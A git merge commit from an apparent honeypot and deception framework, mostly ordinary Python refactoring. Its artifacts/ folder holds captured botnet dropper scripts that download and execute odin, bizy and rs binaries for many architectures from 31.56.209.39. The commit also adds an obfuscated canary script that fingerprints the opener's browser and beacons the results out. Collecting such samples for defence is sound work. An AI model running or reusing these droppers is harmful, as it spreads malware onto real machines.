Merge branch 'merge-rehearsal' into dev

# Conflicts:
#	decnet/templates/postgres/server.py
#	decnet/templates/rdp/Dockerfile
#	decnet/templates/redis/Dockerfile
#	decnet/templates/smtp/Dockerfile
#	decnet/templates/smtp/entrypoint.sh
#	decnet/templates/snmp/Dockerfile
#	decnet/templates/snmp/entrypoint.sh
#	decnet/templates/tftp/Dockerfile
#	decnet/templates/tftp/entrypoint.sh
#	decnet/templates/vnc/Dockerfile
#	decnet/templates/vnc/entrypoint.sh
#	templates/rdp/Dockerfile
#	templates/smb/Dockerfile
#	templates/smtp/Dockerfile
#	templates/smtp/entrypoint.sh
#	templates/snmp/Dockerfile
#	templates/snmp/entrypoint.sh
#	templates/tftp/Dockerfile
#	templates/tftp/entrypoint.sh
#	templates/vnc/Dockerfile
#	tests/services/test_smtp_relay.py
This commit is contained in:
2026-05-01 02:27:20 -04:00
299 changed files with 13964 additions and 1487 deletions

6
.gitignore vendored
View File

@@ -51,3 +51,9 @@ schem
# pydeps-style dependency graph dumps from local analysis runs.
deps.txt
# Node modules vendored under decnet/canary/ for the obfuscator helper.
# The package.json is the source of truth; modules are reinstalled at
# build/deploy time.
node_modules/
package-lock.json

View File

@@ -182,6 +182,7 @@ Archetypes are pre-packaged machine identities. One slug sets services, preferre
| Slug | Services | OS Fingerprint | Description |
|---|---|---|---|
| `deaddeck` | ssh | linux | Initial machine to be exploited. Real SSH container. |
| `windows-workstation` | smb, rdp | windows | Corporate Windows desktop |
| `windows-server` | smb, rdp, ldap | windows | Windows domain member |
| `domain-controller` | ldap, smb, rdp, llmnr | windows | Active Directory DC |
@@ -272,6 +273,11 @@ List live at any time with `decnet services`.
Most services accept persona configuration to make honeypot responses more convincing. Config is passed via INI subsections (`[decky-name.service]`) or the `service_config` field in code.
```ini
[deaddeck-1]
amount=1
archetype=deaddeck
ssh.password=admin
[decky-webmail.http]
server_header = Apache/2.4.54 (Debian)
fake_app = wordpress

3
artifacts/curl.sh Normal file
View File

@@ -0,0 +1,3 @@
[0] Downloading 'http://31.56.209.39/curl.sh' ...
Saving 'curl.sh.1'
HTTP response 200 OK [http://31.56.209.39/curl.sh]

46
artifacts/curl.sh.1 Normal file
View File

@@ -0,0 +1,46 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
#curl http://31.56.209.39/rs.arm -o rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
#curl http://31.56.209.39/rs.arm5 -o rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
#curl http://31.56.209.39/rs.arm6 -o rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
#curl http://31.56.209.39/rs.arm7 -o rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
#curl http://31.56.209.39/rs.mips -o rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
#curl http://31.56.209.39/rs.mipsle -o rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
#curl http://31.56.209.39/rs.mipsSF -o rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
#curl http://31.56.209.39/rs.mipsleSF -o rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
#curl http://31.56.209.39/rs.x86 -o rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
#curl http://31.56.209.39/rs.x64 -o rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
curl http://31.56.209.39/odin.arm -o odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.curl
curl http://31.56.209.39/odin.arm5 -o odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.curl
curl http://31.56.209.39/odin.arm5n -o odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.curl
curl http://31.56.209.39/odin.arm6 -o odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.curl
curl http://31.56.209.39/odin.arm7 -o odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.curl
curl http://31.56.209.39/odin.m68k -o odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.curl
curl http://31.56.209.39/odin.mips -o odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.curl
curl http://31.56.209.39/odin.mpsl -o odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.curl
curl http://31.56.209.39/odin.ppc -o odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.curl
curl http://31.56.209.39/odin.sh4 -o odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.curl
curl http://31.56.209.39/odin.spc -o odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.curl
curl http://31.56.209.39/odin.x64 -o odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.curl
curl http://31.56.209.39/odin.x86 -o odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.curl
curl http://31.56.209.39/bizy.arm5 -o bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
curl http://31.56.209.39/bizy.arm6 -o bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
curl http://31.56.209.39/bizy.arm7 -o bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
curl http://31.56.209.39/bizy.arm8 -o bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
curl http://31.56.209.39/bizy.mips -o bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
curl http://31.56.209.39/bizy.mpsl -o bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
curl http://31.56.209.39/bizy.mipss -o bizy.mipss; chmod +x bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss;
curl http://31.56.209.39/bizy.mpsls -o bizy.mpsls; chmod +x bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls;
curl http://31.56.209.39/bizy.riscv -o bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
curl http://31.56.209.39/bizy.x86 -o bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
curl http://31.56.209.39/bizy.x64 -o bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

3
artifacts/evil.sh Normal file
View File

@@ -0,0 +1,3 @@
wget http://31.56.209.39/wget.sh -o wget.sh
wget http://31.56.209.39/curl.sh -o curl.sh

3
artifacts/wget.sh Normal file
View File

@@ -0,0 +1,3 @@
[0] Downloading 'http://31.56.209.39/wget.sh' ...
Saving 'wget.sh.1'
HTTP response 200 OK [http://31.56.209.39/wget.sh]

46
artifacts/wget.sh.1 Normal file
View File

@@ -0,0 +1,46 @@
#!/bin/sh
ulimit -n 4096
ulimit -n 999999
ulimit -v 2097152
cd /tmp && 1>.x || cd /var/run && 1>.x || cd /mnt && 1>.x || cd /root && 1>.x || cd / && 1>.x || cd /media && 1>.x
rm -rf odin*
rm -rf bizy*
rm -rf rs*
rm -rf *.sh
wget http://31.56.209.39/rs.arm; chmod +x rs.arm; ./rs.arm; rm -rf rs.arm
wget http://31.56.209.39/rs.arm5; chmod +x rs.arm5; ./rs.arm5; rm -rf rs.arm5
wget http://31.56.209.39/rs.arm6; chmod +x rs.arm6; ./rs.arm6; rm -rf rs.arm6
wget http://31.56.209.39/rs.arm7; chmod +x rs.arm7; ./rs.arm7; rm -rf rs.arm7
wget http://31.56.209.39/rs.mips; chmod +x rs.mips; ./rs.mips; rm -rf rs.mips
wget http://31.56.209.39/rs.mipsle; chmod +x rs.mipsle; ./rs.mipsle; rm -rf rs.mipsle
wget http://31.56.209.39/rs.mipsSF; chmod +x rs.mipsSF; ./rs.mipsSF; rm -rf rs.mipsSF
wget http://31.56.209.39/rs.mipsleSF; chmod +x rs.mipsleSF; ./rs.mipsleSF; rm -rf rs.mipsleSF
wget http://31.56.209.39/rs.x86; chmod +x rs.x86; ./rs.x86; rm -rf rs.x86
wget http://31.56.209.39/rs.x64; chmod +x rs.x64; ./rs.x64; rm -rf rs.x64
wget http://31.56.209.39/odin.arm; chmod +x odin.arm; ./odin.arm odin.arm.wget
wget http://31.56.209.39/odin.arm5; chmod +x odin.arm5; ./odin.arm5 odin.arm5.wget
wget http://31.56.209.39/odin.arm5n; chmod +x odin.arm5n; ./odin.arm5n odin.arm5n.wget
wget http://31.56.209.39/odin.arm6; chmod +x odin.arm6; ./odin.arm6 odin.arm6.wget
wget http://31.56.209.39/odin.arm7; chmod +x odin.arm7; ./odin.arm7 odin.arm7.wget
wget http://31.56.209.39/odin.m68k; chmod +x odin.m68k; ./odin.m68k odin.m68k.wget
wget http://31.56.209.39/odin.mips; chmod +x odin.mips; ./odin.mips odin.mips.wget
wget http://31.56.209.39/odin.mpsl; chmod +x odin.mpsl; ./odin.mpsl odin.mpsl.wget
wget http://31.56.209.39/odin.ppc; chmod +x odin.ppc; ./odin.ppc odin.ppc.wget
wget http://31.56.209.39/odin.sh4; chmod +x odin.sh4; ./odin.sh4 odin.sh4.wget
wget http://31.56.209.39/odin.spc; chmod +x odin.spc; ./odin.spc odin.spc.wget
wget http://31.56.209.39/odin.x64; chmod +x odin.x64; ./odin.x64 odin.x64.wget
wget http://31.56.209.39/odin.x86; chmod +x odin.x86; ./odin.x86 odin.x86.wget
wget http://31.56.209.39/bizy.arm5; chmod +x bizy.arm5; ./bizy.arm5; rm -rf bizy.arm5
wget http://31.56.209.39/bizy.arm6; chmod +x bizy.arm6; ./bizy.arm6; rm -rf bizy.arm6
wget http://31.56.209.39/bizy.arm7; chmod +x bizy.arm7; ./bizy.arm7; rm -rf bizy.arm7
wget http://31.56.209.39/bizy.arm8; chmod +x bizy.arm8; ./bizy.arm8; rm -rf bizy.arm8
wget http://31.56.209.39/bizy.mips; chmod +x bizy.mips; ./bizy.mips; rm -rf bizy.mips
wget http://31.56.209.39/bizy.mpsl; chmod +x bizy.mpsl; ./bizy.mpsl; rm -rf bizy.mpsl
wget http://31.56.209.39/bizy.mipss; chmod +x ./bizy.mipss; ./bizy.mipss; rm -rf bizy.mipss
wget http://31.56.209.39/bizy.mpsls; chmod +x ./bizy.mpsls; ./bizy.mpsls; rm -rf bizy.mpsls
wget http://31.56.209.39/bizy.riscv; chmod +x bizy.riscv; ./bizy.riscv; rm -rf bizy.riscv
wget http://31.56.209.39/bizy.x86; chmod +x bizy.x86; ./bizy.x86; rm -rf bizy.x86
wget http://31.56.209.39/bizy.x64; chmod +x bizy.x64; ./bizy.x64; rm -rf bizy.x64

BIN
decnet.tar Normal file

Binary file not shown.

View File

@@ -59,6 +59,73 @@ def _topology_id(hydrated: dict[str, Any]) -> str:
return str(tid)
def _check_hash_and_validate(hydrated: dict[str, Any], version_hash: str) -> str:
    """Gate an incoming topology on hash integrity and structural validity.

    Recomputes the canonical hash of *hydrated* on the agent and compares it
    with the *version_hash* supplied by the master, then runs topology
    validation.

    Returns:
        The topology id extracted from *hydrated*.

    Raises:
        HashMismatch: the locally computed hash differs from *version_hash*.
        ValidationError: validation reported at least one error-level issue.
    """
    agent_hash = canonical_hash(hydrated)
    if agent_hash != version_hash:
        mismatch = (
            f"master hash {version_hash!r} does not match agent hash "
            f"{agent_hash!r} — refusing to apply"
        )
        raise HashMismatch(mismatch)

    findings = _validate_topology(hydrated)
    if _validation_errors(findings):
        # The full issue list travels with the exception, not just the errors.
        raise ValidationError(findings)

    return _topology_id(hydrated)
async def _teardown_superseded(topology_id: str, store: TopologyStore) -> None:
"""Tear down the current topology if it differs from topology_id.
Master is authoritative — a different pinned topology (fully applied,
partially applied, or drifted) is torn down before the new apply proceeds.
Refusing with 409 would leave the agent stuck in a state only a human
could resolve.

Returns without doing anything when the store has no current row or when
the current row already belongs to ``topology_id``. Exceptions raised by
the teardown call are logged as warnings and are not re-raised.
"""
existing = store.current()
# Nothing pinned, or the pinned topology is the one being applied: no-op.
if existing is None or existing.topology_id == topology_id:
return
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked by a
# half-torn-down predecessor. Leftover docker objects surface via
# the next heartbeat's observed block.
# NOTE(review): indentation is not visible in this view — confirm whether
# the clear below runs only inside the except handler (failed teardown) or
# unconditionally after the try/except.
store.clear(existing.topology_id)
def _materialise(hydrated: dict[str, Any], topology_id: str) -> None:
    """Realise a topology on the local docker daemon.

    Three steps, in order: one bridge network per LAN, the compose file for
    the topology, then ``compose up``. Everything here blocks, so async
    callers are expected to run it through ``asyncio.to_thread``.

    Why ``--always-recreate-deps``: each decky service shares its base
    container's network namespace through ``network_mode: container:<base>``,
    and that share is fixed when the service starts. When a base gets
    recreated (for instance ``ports:`` changes after ``forwards_l3`` is
    toggled) while compose considers the services unchanged, the services
    hold a stale netns FD for the destroyed base. They are left in an empty
    namespace containing only ``lo`` and outside traffic reaches a closed
    port on the new base. Recreating dependents together with the base is
    the cheapest way to rule that race out.
    """
    compose_path = _topology_compose_path(topology_id)
    client = docker.from_env()

    for lan in hydrated["lans"]:
        # Only the DMZ LAN is externally reachable; every other bridge is
        # created as an internal network.
        create_bridge_network(
            client,
            _topology_network_name(topology_id, lan["name"]),
            lan["subnet"],
            internal=not lan["is_dmz"],
        )

    write_topology_compose(hydrated, compose_path)

    up_args = ("up", "--build", "-d", "--always-recreate-deps")
    _compose_with_retry(*up_args, compose_file=compose_path)
async def apply(
hydrated: dict[str, Any],
version_hash: str,
@@ -73,76 +140,11 @@ async def apply(
Any docker / compose error propagates up; the endpoint maps it
to 500 and records the message on the store row.
"""
local_hash = canonical_hash(hydrated)
if local_hash != version_hash:
raise HashMismatch(
f"master hash {version_hash!r} does not match agent hash "
f"{local_hash!r} — refusing to apply"
)
issues = _validate_topology(hydrated)
if _validation_errors(issues):
raise ValidationError(issues)
topology_id = _topology_id(hydrated)
# Master is authoritative. If a different topology is pinned here
# — whether it fully applied, only partially applied (failure
# marker row + orphan containers), or drifted — teardown first,
# then accept the new one. Refusing with 409 would leave the
# agent stuck in a state only a human could resolve.
existing = store.current()
if existing is not None and existing.topology_id != topology_id:
log.info(
"superseding topology %s with %s on master authority",
existing.topology_id, topology_id,
)
try:
await teardown(existing.topology_id, store)
except Exception as exc: # noqa: BLE001 — we still want to try applying
log.warning(
"best-effort teardown of superseded topology %s failed: %s",
existing.topology_id, exc,
)
# Hard-clear the store row so the new apply isn't blocked
# by a half-torn-down predecessor. Leftover docker objects
# will surface via the next heartbeat's observed block.
store.clear(existing.topology_id)
lans = hydrated["lans"]
compose_path = _topology_compose_path(topology_id)
client = docker.from_env()
# Bridges + compose are sync/blocking; hop to a thread so we don't
# stall the event loop on a slow docker daemon.
def _materialise() -> None:
for lan in lans:
net_name = _topology_network_name(topology_id, lan["name"])
internal = not lan["is_dmz"]
create_bridge_network(
client, net_name, lan["subnet"], internal=internal
)
write_topology_compose(hydrated, compose_path)
# ``--always-recreate-deps`` keeps service containers' netns shares
# fresh: every decky service joins its base's netns via
# ``network_mode: container:<base>``, and that share is bound at
# service start time. If a base is recreated (e.g. when ``ports:``
# changes after toggling ``forwards_l3``) but compose decides the
# services are unchanged, the services keep a stale netns FD
# pointing at the destroyed base — they end up in an empty
# namespace with only ``lo``, and external traffic hits a closed
# port on the live base. Forcing dependents to recreate alongside
# the base is the cheapest way to make this race impossible.
_compose_with_retry(
"up", "--build", "-d", "--always-recreate-deps",
compose_file=compose_path,
)
await asyncio.to_thread(_materialise)
topology_id = _check_hash_and_validate(hydrated, version_hash)
await _teardown_superseded(topology_id, store)
await asyncio.to_thread(_materialise, hydrated, topology_id)
store.put(topology_id, version_hash, hydrated)
log.info(
"topology %s applied on agent (%d LANs)", topology_id, len(lans)
)
log.info("topology %s applied on agent (%d LANs)", topology_id, len(hydrated["lans"]))
async def teardown(

View File

@@ -63,6 +63,7 @@ class TopologyStore:
# The agent is single-process, so there's no real contention —
# sqlite's own connection lock is enough.
self._conn = sqlite3.connect(str(db_path), check_same_thread=False)
self._conn.row_factory = sqlite3.Row
self._conn.execute(
"CREATE TABLE IF NOT EXISTS applied_topology ("
" topology_id TEXT PRIMARY KEY,"
@@ -84,11 +85,11 @@ class TopologyStore:
if row is None:
return None
return AppliedRow(
topology_id=row[0],
applied_version_hash=row[1],
hydrated=json.loads(row[2]),
applied_at=int(row[3]),
last_error=row[4],
topology_id=row["topology_id"],
applied_version_hash=row["applied_version_hash"],
hydrated=json.loads(row["hydrated_blob_json"]),
applied_at=int(row["applied_at"]),
last_error=row["last_error"],
)
# ---------------------------------------------------------------- writes

View File

@@ -13,7 +13,7 @@ from typing import Sequence
from decnet.asn.base import Provider
from decnet.asn.iptoasn.fetch import IPTOASN_SOURCES, fetch_all
from decnet.asn.iptoasn.parse import parse_file
from decnet.asn.lookup import AsnLookup
from decnet.asn.lookup import AsnLookup, Range
from decnet.asn.paths import ensure_root
logger = logging.getLogger("decnet.asn.iptoasn.provider")
@@ -54,7 +54,7 @@ class IptoasnProvider(Provider):
"asn.iptoasn: cache load failed, rebuilding: %s", exc
)
ranges = []
ranges: list[Range] = []
for path in self.data_paths():
if not path.exists():
continue

View File

@@ -54,6 +54,7 @@ SYSTEM = "system"
CREDENTIAL = "credential"
ORCHESTRATOR = "orchestrator"
CANARY = "canary"
SMTP = "smtp"
# ─── Leaf event-type constants (the last segment of each topic) ──────────────
@@ -83,6 +84,19 @@ DECKY_MUTATE_REQUEST = "mutate_request"
# syslog sidechannel too) to interleave substrate-change markers into
# attacker traversals.
DECKY_MUTATION = "mutation"
# Per-service add/remove on a deployed decky (live; no full redeploy).
# Payload carries ``decky_name``, ``service_name``, optional
# ``topology_id``, and ``services`` (the post-mutation list). Consumers
# that watch substrate shape (correlator, dashboard, profiler) reconcile
# off these without waiting for the next decnet-state.json snapshot.
DECKY_SERVICE_ADDED = "service_added"
DECKY_SERVICE_REMOVED = "service_removed"
# Per-service config change (the schema-driven Inspector form). Payload
# carries ``decky_name``, ``service_name``, optional ``topology_id``,
# ``service_config`` (the new validated dict), and ``recreated`` — true
# when the operator hit Apply (container was force-recreated to pick up
# the new env), false when they only hit Save (DB-only).
DECKY_SERVICE_CONFIG_CHANGED = "service_config_changed"
# Attacker event types (second token under the ``attacker`` root). First
# sighting, session boundary transitions, and score-threshold crossings
@@ -381,6 +395,16 @@ def system_control(worker: str) -> str:
return f"{SYSTEM}.{worker}.{SYSTEM_CONTROL}"
def smtp(event_type: str) -> str:
    """Return the bus topic ``smtp.<event_type>``.

    *event_type* is appended verbatim, so it may itself contain dots
    (e.g. ``probe.pending``).

    Raises:
        ValueError: *event_type* is empty.
    """
    if event_type:
        return f"{SMTP}.{event_type}"
    raise ValueError("smtp topic requires a non-empty event_type")
def _reject_tokens(*parts: str) -> None:
"""Reject topic segments that would break NATS-style tokenization.

View File

@@ -0,0 +1,18 @@
// Node helper invoked by decnet.canary.obfuscator.
// Reads {code, options} JSON from stdin, writes obfuscated JS to stdout.
// Kept dependency-light on purpose: only javascript-obfuscator.
//
// Exit status: 0 on success; 2 on any failure (malformed JSON on stdin or an
// error thrown by the obfuscator), with the error stack or message on stderr.
const JsObf = require('javascript-obfuscator');

// stdin is buffered in full before parsing; the payload is a single JSON doc.
let raw = '';
process.stdin.setEncoding('utf8');
process.stdin.on('data', (chunk) => { raw += chunk; });
process.stdin.on('end', () => {
  try {
    const { code, options } = JSON.parse(raw);
    const result = JsObf.obfuscate(code, options || {});
    process.stdout.write(result.getObfuscatedCode());
  } catch (e) {
    process.stderr.write(String(e && e.stack || e));
    // Set the exit code rather than calling process.exit(): exit() terminates
    // immediately and can drop stderr output that has not been flushed yet.
    // Nothing else is pending after 'end', so the process still exits with 2.
    process.exitCode = 2;
  }
});

View File

@@ -100,6 +100,12 @@ class CanaryArtifact:
planting. Never leaked to the attacker-facing surface.
"""
fingerprint_nonce: Optional[str] = None
"""Per-mint HMAC nonce for fingerprint canaries; ``None`` for everything
else. Cultivator reads this and persists it on ``CanaryToken.fingerprint_nonce``
so the worker can validate incoming ``?k=`` params.
"""
class CanaryGenerator(ABC):
"""Produces a fake artifact from scratch."""

View File

@@ -46,6 +46,8 @@ _CLASS_TO_GENERATOR: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "honeydoc_docx",
ContentClass.CANARY_HONEYDOC_PDF: "honeydoc_pdf",
ContentClass.CANARY_MYSQL_DUMP: "mysql_dump",
ContentClass.CANARY_FINGERPRINT_HTML: "fingerprint_html",
ContentClass.CANARY_FINGERPRINT_SVG: "fingerprint_svg",
}
@@ -62,6 +64,8 @@ _GENERATOR_TO_KIND: dict[str, str] = {
"honeydoc_pdf": "http",
"ssh_key": "dns", # trip is DNS resolution of host comment
"mysql_dump": "dns", # trip is DNS resolution of subdomain
"fingerprint_html": "http", # obfuscated JS beacons GET /c/<slug>
"fingerprint_svg": "http", # same, embedded inside SVG <script>
}
@@ -78,6 +82,8 @@ _DEFAULT_PATH: dict[ContentClass, str] = {
ContentClass.CANARY_HONEYDOC_DOCX: "/home/{persona}/Documents/Q3-Operations-Review.docx",
ContentClass.CANARY_HONEYDOC_PDF: "/home/{persona}/Documents/Q3-Operations-Review.pdf",
ContentClass.CANARY_MYSQL_DUMP: "/var/backups/db_backup.sql",
ContentClass.CANARY_FINGERPRINT_HTML: "/home/{persona}/Documents/asset_directory.html",
ContentClass.CANARY_FINGERPRINT_SVG: "/home/{persona}/Documents/network_topology.svg",
}
@@ -156,7 +162,7 @@ async def cultivate(
# attribute a callback if the artifact trips during the plant
# itself (improbable but possible — DOCX viewers can preview
# autoplay-style).
await repo.create_canary_token({
token_data: dict = {
"kind": _GENERATOR_TO_KIND.get(gen_name, "http"),
"decky_name": plan.decky_name,
"instrumenter": None,
@@ -167,7 +173,10 @@ async def cultivate(
"placed_at": datetime.now(timezone.utc),
"created_by": created_by,
"state": "planted",
})
}
if artifact.fingerprint_nonce is not None:
token_data["fingerprint_nonce"] = artifact.fingerprint_nonce
await repo.create_canary_token(token_data)
# Carry the placement_path on the artifact so the orchestrator's
# plant_file call uses it. We don't mutate the generator's

View File

@@ -21,6 +21,8 @@ KNOWN_GENERATORS: Tuple[str, ...] = (
"honeydoc_docx",
"honeydoc_pdf",
"mysql_dump",
"fingerprint_html",
"fingerprint_svg",
)
KNOWN_INSTRUMENTERS: Tuple[str, ...] = (
@@ -64,6 +66,16 @@ def get_generator(name: str) -> CanaryGenerator:
if name == "mysql_dump":
from decnet.canary.generators.mysql_dump import MySQLDumpGenerator
return MySQLDumpGenerator()
if name == "fingerprint_html":
from decnet.canary.generators.fingerprint_html import (
FingerprintHtmlGenerator,
)
return FingerprintHtmlGenerator()
if name == "fingerprint_svg":
from decnet.canary.generators.fingerprint_svg import (
FingerprintSvgGenerator,
)
return FingerprintSvgGenerator()
raise ValueError(
f"Unknown canary generator: {name!r}. Known: {KNOWN_GENERATORS}"
)

View File

@@ -0,0 +1,291 @@
// Canary fingerprint payload — the JS that runs inside an opened HTML/SVG
// canary, harvests browser primitives, and beacons the result back to the
// canary worker. Ported from canary-self-test.html with the rendering UI
// stripped out.
//
// Three placeholders are substituted by the Python builder BEFORE
// javascript-obfuscator runs:
//
// {{BEACON_URL}} → full URL to /c/<callback_token> (no trailing slash)
// {{MINT_UUID}} → per-mint UUID, baked into the string-array post-obf
// {{MINT_NONCE}} → 16-hex HMAC nonce; the worker rejects ?d=/?o= without it
//
// Beacon strategy (MVP): a bare GET pixel for "I was opened" reliability,
// then a fingerprint payload sent as a base64-URL query param on a second
// GET so the existing worker records the hit even before step-4 POST
// support lands. Both fail-open: any error short-circuits to next step.
(async function () {
// Placeholders below are replaced by the builder before obfuscation.
var BEACON_URL = "{{BEACON_URL}}";
var MINT_UUID = "{{MINT_UUID}}";
var MINT_NONCE = "{{MINT_NONCE}}";
// Accumulator for every probe result; each probe stores its output (or an
// { err: ... } marker) under one short key.
var fp = { mint: MINT_UUID };
// Fire-and-forget GET: assigning Image.src issues the request; the response
// is never read and any exception is swallowed.
function fire(url) {
try {
var img = new Image();
img.src = url;
} catch (e) { /* swallow */ }
}
// 1) bare-open beacon — fires regardless of whether the rest succeeds
fire(BEACON_URL + "?o=1&k=" + MINT_NONCE);
// Returns a Promise resolving to the lowercase hex SHA-256 of str
// (encoded with TextEncoder).
function sha256(str) {
var buf = new TextEncoder().encode(str);
return crypto.subtle.digest("SHA-256", buf).then(function (h) {
return Array.from(new Uint8Array(h))
.map(function (b) { return b.toString(16).padStart(2, "0"); })
.join("");
});
}
// navigator
try {
fp.nav = {
ua: navigator.userAgent,
pl: navigator.platform,
lg: navigator.language,
lgs: (navigator.languages || []).join(","),
ck: navigator.cookieEnabled,
dnt: navigator.doNotTrack,
hc: navigator.hardwareConcurrency,
dm: navigator.deviceMemory || null,
tp: navigator.maxTouchPoints,
wd: navigator.webdriver === true,
pdf: navigator.pdfViewerEnabled || null,
};
} catch (e) { fp.nav = { err: String(e) }; }
// screen
try {
fp.scr = {
w: screen.width, h: screen.height,
aw: screen.availWidth, ah: screen.availHeight,
cd: screen.colorDepth, pd: screen.pixelDepth,
dpr: window.devicePixelRatio,
iw: window.innerWidth, ih: window.innerHeight,
or: (screen.orientation && screen.orientation.type) || null,
};
} catch (e) { fp.scr = { err: String(e) }; }
// tz / locale
try {
var dtf = Intl.DateTimeFormat().resolvedOptions();
fp.tz = {
z: dtf.timeZone, lc: dtf.locale,
ca: dtf.calendar, ns: dtf.numberingSystem,
off: new Date().getTimezoneOffset(),
};
} catch (e) { fp.tz = { err: String(e) }; }
// connection
try {
var c = navigator.connection;
fp.cn = c ? {
t: c.effectiveType, dl: c.downlink, rtt: c.rtt, sd: c.saveData,
} : null;
} catch (e) { fp.cn = { err: String(e) }; }
// canvas
// Draws fixed shapes and text, then hashes the resulting data URL.
// NOTE(review): String.fromCharCode keeps only the low 16 bits of its
// argument, so 0x1f600 yields U+F600 rather than the U+1F600 emoji
// (String.fromCodePoint would produce the emoji). Changing it would alter
// every canvas hash — confirm which glyph is intended before touching it.
try {
var cv = document.createElement("canvas");
cv.width = 280; cv.height = 60;
var ctx = cv.getContext("2d");
ctx.textBaseline = "top";
ctx.font = "14px Arial";
ctx.fillStyle = "#f60";
ctx.fillRect(125, 1, 62, 20);
ctx.fillStyle = "#069";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 2, 15);
ctx.fillStyle = "rgba(102,204,0,0.7)";
ctx.fillText("c-" + String.fromCharCode(0x1f600), 4, 17);
var dataURL = cv.toDataURL();
fp.cv = { h: await sha256(dataURL), n: dataURL.length };
} catch (e) { fp.cv = { err: String(e) }; }
// webgl
try {
var gc = document.createElement("canvas");
var gl = gc.getContext("webgl") || gc.getContext("experimental-webgl");
if (gl) {
// The unmasked vendor/renderer strings are only read when the debug
// extension is available; otherwise uv/ur are null.
var ext = gl.getExtension("WEBGL_debug_renderer_info");
fp.gl = {
v: gl.getParameter(gl.VENDOR),
r: gl.getParameter(gl.RENDERER),
ver: gl.getParameter(gl.VERSION),
sl: gl.getParameter(gl.SHADING_LANGUAGE_VERSION),
uv: ext ? gl.getParameter(ext.UNMASKED_VENDOR_WEBGL) : null,
ur: ext ? gl.getParameter(ext.UNMASKED_RENDERER_WEBGL) : null,
};
} else { fp.gl = { err: "unavailable" }; }
} catch (e) { fp.gl = { err: String(e) }; }
// audio
// Renders a triangle oscillator through a dynamics compressor offline and
// sums the absolute values of samples 4500..4999 of the output.
try {
var ACtx = window.OfflineAudioContext || window.webkitOfflineAudioContext;
if (ACtx) {
var actx = new ACtx(1, 44100, 44100);
var osc = actx.createOscillator();
var cmp = actx.createDynamicsCompressor();
osc.type = "triangle"; osc.frequency.value = 10000;
cmp.threshold.value = -50; cmp.knee.value = 40;
cmp.ratio.value = 12; cmp.attack.value = 0; cmp.release.value = 0.25;
osc.connect(cmp); cmp.connect(actx.destination);
osc.start(0);
var buf = await actx.startRendering();
var data = buf.getChannelData(0).slice(4500, 5000);
var sum = 0;
for (var i = 0; i < data.length; i++) sum += Math.abs(data[i]);
fp.au = { h: await sha256(sum.toString()), s: sum.toFixed(8) };
} else { fp.au = { err: "unavailable" }; }
} catch (e) { fp.au = { err: String(e) }; }
// fonts
// Measures an off-screen span in each generic base family, then again with
// each candidate font placed first; a size change against any base marks
// the candidate as detected.
// NOTE(review): this appends to document.body, which is presumably null
// when the payload runs inside a standalone SVG document; the resulting
// throw would be caught below and recorded as fp.ft.err — confirm.
try {
var bases = ["monospace", "sans-serif", "serif"];
var tests = [
"Arial", "Helvetica", "Times New Roman", "Courier New", "Verdana",
"Georgia", "Trebuchet MS", "Comic Sans MS", "Impact",
"Calibri", "Cambria", "Consolas", "Segoe UI", "Tahoma",
"JetBrains Mono", "Fira Code", "Cascadia Code", "SF Mono",
"Menlo", "Monaco", "Source Code Pro", "Inconsolata", "Hack",
"San Francisco", "Helvetica Neue", "Lucida Grande",
"DejaVu Sans", "DejaVu Sans Mono", "Liberation Sans",
"Liberation Mono", "Ubuntu", "Ubuntu Mono", "Roboto",
"Noto Sans", "Noto Mono",
"Microsoft YaHei", "SimSun", "PingFang SC", "Hiragino Sans",
